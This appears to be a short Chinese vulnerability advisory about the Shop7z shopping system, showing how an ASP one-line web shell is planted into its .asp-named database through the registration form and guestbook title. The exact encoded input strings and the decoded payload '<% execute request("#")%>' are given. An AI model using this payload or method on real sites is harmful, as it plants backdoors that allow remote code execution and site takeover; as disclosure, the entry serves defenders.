shop7z购物系统可插一句话

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 数据库默认为asp后缀,提供了插一句话的前提,用错误代码方式防止数据库下载,但是可以注释掉错误代码 ### 详细说明: 记事本打开数据库看了下这串代码的大概位置,然后就开始找地方插一句话。 注册一个帐号, 注册信息时随便找个地方填入 ┳> 原型为 3%> 然后再到留言处留言,标题填写 ┼攠數畣整爠煥敵瑳∨∣┩愾┼砧 原型为 <% execute request("#")%>a<%'x 打开数据库地址查看报错方式, 以成功插入一句话 [<img src="https://images.seebug.org/upload/201312/281825388baaf113ebf5f5c44d29cd30bb1f03f5.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/281825388baaf113ebf5f5c44d29cd30bb1f03f5.jpg) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201312/2818262794d3e1549ee89de9fe0bc5b74818e844.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/2818262794d3e1549ee89de9fe0bc5b74818e844.jpg) 测试官网当前版本

0%
暂无可用Exp或PoC
当前有0条受影响产品信息